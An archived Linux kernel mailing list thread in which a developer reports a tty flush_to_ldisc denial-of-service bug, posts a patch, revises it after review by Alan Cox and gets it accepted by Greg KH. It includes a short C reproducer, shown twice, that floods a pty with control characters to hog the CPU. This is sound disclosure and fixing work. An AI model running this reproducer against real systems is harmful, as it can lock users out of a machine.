Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.
Dismiss

[PATCH] tty: prevent DOS in the flush_to_ldisc

9 views
Skip to first unread message

Jiri Olsa

unread,
Oct 27, 2010, 3:20:01 AM10/27/10
to
hi,

there's a small window inside the flush_to_ldisc function,
where the tty is unlocked and calling ldisc's receive_buf
function. If in this window new buffer is added to the tty,
the processing might never leave the flush_to_ldisc function.

This scenario will hog the cpu, causing other tty processing
starving, and making it impossible to interface the computer
via tty.

I was able to exploit this via pty interface by sending only
control characters to the master input, causing the flush_to_ldisc
to be scheduled, but never actually generate any output.

To reproduce, please run multiple instances of following code.

---
#define _XOPEN_SOURCE
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

int main(int argc, char **argv)
{
int i, slave, master = getpt();
char buf[8192];

sprintf(buf, "%s", ptsname(master));
grantpt(master);
unlockpt(master);

slave = open(buf, O_RDWR);
if (slave < 0) {
perror("open slave failed");
return 1;
}

for(i = 0; i < sizeof(buf); i++)
buf[i] = rand() % 32;

while(1) {
write(master, buf, sizeof(buf));
}

return 0;
}
---

The attached patch (based on -next tree) fixes this by adding threshold
for processed data. When the threshold is reached, the current work is
rescheduled, so another could run.

The threshold is set to the tty buffer maximum size.

wbr,
jirka


Signed-off-by: Jiri Olsa <jo...@redhat.com>
---
drivers/char/tty_buffer.c | 15 ++++++++++++++-
include/linux/tty.h | 1 +
2 files changed, 15 insertions(+), 1 deletions(-)

diff --git a/drivers/char/tty_buffer.c b/drivers/char/tty_buffer.c
index cc1e985..7703114 100644
--- a/drivers/char/tty_buffer.c
+++ b/drivers/char/tty_buffer.c
@@ -58,7 +58,7 @@ static struct tty_buffer *tty_buffer_alloc(struct tty_struct *tty, size_t size)
{
struct tty_buffer *p;

- if (tty->buf.memory_used + size > 65536)
+ if (tty->buf.memory_used + size > TTY_BUFFER_MAXSIZE)
return NULL;
p = kmalloc(sizeof(struct tty_buffer) + 2 * size, GFP_ATOMIC);
if (p == NULL)
@@ -414,6 +414,7 @@ static void flush_to_ldisc(struct work_struct *work)

if (!test_and_set_bit(TTY_FLUSHING, &tty->flags)) {
struct tty_buffer *head;
+ int count_acc = 0;
while ((head = tty->buf.head) != NULL) {
int count;
char *char_buf;
@@ -436,11 +437,23 @@ static void flush_to_ldisc(struct work_struct *work)
schedule_delayed_work(&tty->buf.work, 1);
break;
}
+ /*
+ * There's a possibility tty might get new buffer
+ * added during the unlock window below. We could
+ * end up spinning in here forever hogging the CPU
+ * completely. To avoid this let's have a rest each
+ * time we process the maximum one tty can hold.
+ */
+ if (count_acc > TTY_BUFFER_MAXSIZE) {
+ schedule_delayed_work(&tty->buf.work, 1);
+ break;
+ }
if (count > tty->receive_room)
count = tty->receive_room;
char_buf = head->char_buf_ptr + head->read;
flag_buf = head->flag_buf_ptr + head->read;
head->read += count;
+ count_acc += count;
spin_unlock_irqrestore(&tty->buf.lock, flags);
disc->ops->receive_buf(tty, char_buf,
flag_buf, count);
diff --git a/include/linux/tty.h b/include/linux/tty.h
index e500171..708e299 100644
--- a/include/linux/tty.h
+++ b/include/linux/tty.h
@@ -80,6 +80,7 @@ struct tty_buffer {
*/

#define TTY_BUFFER_PAGE (((PAGE_SIZE - sizeof(struct tty_buffer)) / 2) & ~0xFF)
+#define TTY_BUFFER_MAXSIZE (65536)


struct tty_bufhead {
--
1.7.1

--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majo...@vger.kernel.org
More majordomo info at http://vger.kernel.org/majordomo-info.html
Please read the FAQ at http://www.tux.org/lkml/

Jiri Olsa

unread,
Nov 8, 2010, 8:50:02 AM11/8/10
to
hi, any feedback?

thanks,
jirka

Alan Cox

unread,
Nov 8, 2010, 9:20:02 AM11/8/10
to
On Mon, 8 Nov 2010 14:48:41 +0100
Jiri Olsa <jo...@redhat.com> wrote:

> hi, any feedback?

Don't think I saw this before.

> > The attached patch (based on -next tree) fixes this by adding threshold
> > for processed data. When the threshold is reached, the current work is
> > rescheduled, so another could run.
> >
> > The threshold is set to the tty buffer maximum size.

That is an n_tty concept really - most other ldiscs simply eat stuff as
it hits them. It's also something we've got some evidence may need to
become a variable, but would still make sense.

Would it be simpler to remember the queue end before the first iteration
and not go past the queue end as it was at the entry to flush_to_ldisc.

Alan

Jiri Olsa

unread,
Nov 8, 2010, 1:10:02 PM11/8/10
to
On Mon, Nov 08, 2010 at 02:09:38PM +0000, Alan Cox wrote:
> On Mon, 8 Nov 2010 14:48:41 +0100
> Jiri Olsa <jo...@redhat.com> wrote:
>
> > hi, any feedback?
>
> Don't think I saw this before.
>
> > > The attached patch (based on -next tree) fixes this by adding threshold
> > > for processed data. When the threshold is reached, the current work is
> > > rescheduled, so another could run.
> > >
> > > The threshold is set to the tty buffer maximum size.
>
> That is an n_tty concept really - most other ldiscs simply eat stuff as
> it hits them. It's also something we've got some evidence may need to
> become a variable, but would still make sense.
>
> Would it be simpler to remember the queue end before the first iteration
> and not go past the queue end as it was at the entry to flush_to_ldisc.

hi,

thanks for answering :)
I changed the patch to check on the tail buffer instead..
seems it's better.

wbr,
jirka
---

There's a small window inside the flush_to_ldisc function,


where the tty is unlocked and calling ldisc's receive_buf
function. If in this window new buffer is added to the tty,
the processing might never leave the flush_to_ldisc function.

This scenario will hog the cpu, causing other tty processing
starving, and making it impossible to interface the computer
via tty.

I was able to exploit this via pty interface by sending only
control characters to the master input, causing the flush_to_ldisc
to be scheduled, but never actually generate any output.

To reproduce, please run multiple instances of following code.

- SNIP


#define _XOPEN_SOURCE
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

int main(int argc, char **argv)
{
int i, slave, master = getpt();
char buf[8192];

sprintf(buf, "%s", ptsname(master));
grantpt(master);
unlockpt(master);

slave = open(buf, O_RDWR);
if (slave < 0) {
perror("open slave failed");
return 1;
}

for(i = 0; i < sizeof(buf); i++)
buf[i] = rand() % 32;

while(1) {
write(master, buf, sizeof(buf));
}

return 0;
}
- SNIP

The attached patch (based on -next tree) fixes this by checking on the
tty buffer tail. Once it's reached, the current work is rescheduled
and another could run.

wbr,
jirka

Signed-off-by: Jiri Olsa <jo...@redhat.com>
---

drivers/char/tty_buffer.c | 14 ++++++++++++--
1 files changed, 12 insertions(+), 2 deletions(-)

diff --git a/drivers/char/tty_buffer.c b/drivers/char/tty_buffer.c
index cc1e985..d8210ca 100644
--- a/drivers/char/tty_buffer.c
+++ b/drivers/char/tty_buffer.c
@@ -413,7 +413,8 @@ static void flush_to_ldisc(struct work_struct *work)
spin_lock_irqsave(&tty->buf.lock, flags);

if (!test_and_set_bit(TTY_FLUSHING, &tty->flags)) {
- struct tty_buffer *head;
+ struct tty_buffer *head, *tail = tty->buf.tail;
+ int seen_tail = 0;


while ((head = tty->buf.head) != NULL) {
int count;
char *char_buf;

@@ -423,6 +424,15 @@ static void flush_to_ldisc(struct work_struct *work)
if (!count) {
if (head->next == NULL)
break;
+ /*
+ There's a possibility tty might get new buffer
+ added during the unlock window below. We could
+ end up spinning in here forever hogging the CPU
+ completely. To avoid this let's have a rest each
+ time we processed the tail buffer.
+ */
+ if (tail == head)
+ seen_tail = 1;
tty->buf.head = head->next;
tty_buffer_free(tty, head);
continue;
@@ -432,7 +442,7 @@ static void flush_to_ldisc(struct work_struct *work)
line discipline as we want to empty the queue */
if (test_bit(TTY_FLUSHPENDING, &tty->flags))
break;
- if (!tty->receive_room) {
+ if (!tty->receive_room || seen_tail) {
schedule_delayed_work(&tty->buf.work, 1);
break;
}
--
1.7.1

Alan Cox

unread,
Nov 9, 2010, 5:40:02 AM11/9/10
to
> The attached patch (based on -next tree) fixes this by checking on the
> tty buffer tail. Once it's reached, the current work is rescheduled
> and another could run.

Looks nice and tidy

Alan

Jiri Olsa

unread,
Nov 9, 2010, 5:50:02 AM11/9/10
to
On Tue, Nov 09, 2010 at 10:35:39AM +0000, Alan Cox wrote:
> > The attached patch (based on -next tree) fixes this by checking on the
> > tty buffer tail. Once it's reached, the current work is rescheduled
> > and another could run.
>
> Looks nice and tidy
>
> Alan

would you advise on whom to send it to pick it up?

thanks,
jirka

Greg KH

unread,
Nov 9, 2010, 9:00:02 AM11/9/10
to
On Tue, Nov 09, 2010 at 11:44:30AM +0100, Jiri Olsa wrote:
> On Tue, Nov 09, 2010 at 10:35:39AM +0000, Alan Cox wrote:
> > > The attached patch (based on -next tree) fixes this by checking on the
> > > tty buffer tail. Once it's reached, the current work is rescheduled
> > > and another could run.
> >
> > Looks nice and tidy
> >
> > Alan
>
> would you advise on whom to send it to pick it up?

I will.

thanks,

greg k-h

0 new messages